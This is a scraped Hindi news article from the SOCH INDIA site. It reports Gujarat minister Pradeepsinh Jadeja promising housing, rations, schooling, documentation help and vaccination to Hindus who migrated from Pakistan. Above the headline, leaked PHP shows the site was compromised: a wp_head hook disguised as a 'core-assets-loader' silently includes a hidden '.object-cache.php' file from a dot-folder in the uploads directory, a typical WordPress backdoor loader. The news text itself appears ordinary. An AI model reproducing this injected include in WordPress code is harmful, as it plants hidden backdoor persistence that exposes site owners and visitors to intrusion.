add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); पाकिस्तान से आए हिंदुओं को यहां कोई तकलीफ नहीं होगी, सारी व्यवस्थाएं गुजरात सरकार कर रही है : गृहमंत्री जडेजा – SOCH INDIA
Menu

देश
पाकिस्तान से आए हिंदुओं को यहां कोई तकलीफ नहीं होगी, सारी व्यवस्थाएं गुजरात सरकार कर रही है : गृहमंत्री जडेजा

nobanner

पाकिस्तान से स्थानांतरित होकर आने वाले हिंदूओं को किसी भी तरह की तकलीफ न हो इसके लिए गुजरात सरकार कटिबद्ध है। ऐसे स्थलांतरित होकर आए हिंदू नागरिकों को गुजरात में रहने सहित राशन और उनके बच्चों की शिक्षा सहित सारी सुविधाएं राज्य सरकार की ओर से उपलब्ध की जा रही है। यह बात पाकिस्तान और बांग्लादेश से आए हिंदुओं को होने वाली परेशानियों का निपटारा करने के लिए आयोजित समीक्षा बैठक के दौरान राज्य गृहमंत्री प्रदीपसिंह जडेजा ने कही।

लॉन्ग टर्म वीजा पर भारत में रहने वाले पाकिस्तानी हिंदू नागरिकों को होने वाली व्यावहारिक परेशानियों का भी निपटारा किया जाएगा तथा कोरोना की प्रवर्तमान परिस्थिति को ध्यान में रखते हुए इन लोगों को कोरोना से बचाने के लिए टीकाकरण करने का भी निर्णय लिया गया है।

पाकिस्तानी हिंदू लोगों को होने वाली परेशानियों का निपटारा करने के लिए आयोजित समीक्षा बैठक में गृह राज्यमंत्री प्रदीपसिंह जड़ेजा ने यह जानकारी दी। मंत्री जड़ेजा ने कहा कि राज्य के संवेदनशील मुख्यमंत्री विजय रुपाणी ने पाकिस्तान से स्थानांतरित होने वाले हिंदूओं को गुजरात में किसी भी प्रकार की तकलीफ न हो इसके लिए कार्रवाई शुरू कर दी है।

जडेजा ने कहा कि पाकिस्तान, अफगानिस्तान और बांग्लादेश में वर्षों से प्रताड़ित हो रहे हिंदुओं को नया जीवन दिया गया है। इन्हें भारतीय नागरिकता दे दी गई है और अब ये यहां खुली हवा में सांस ले सकते हैं। उन्होंने आगे कहा, 2014 से पहले पाकिस्तान से भारत आए नागरिक आर्थिक रूप से कमजोर हैं और वे पासपोर्ट रिनुअल के लिए दिल्ली स्थित पाकिस्तानी दूतावास नहीं जा सकते। इसके चलते हम उनके डॉक्यूमेंटेशन की सारी व्यवस्थाएं यहीं कर रहे हैं।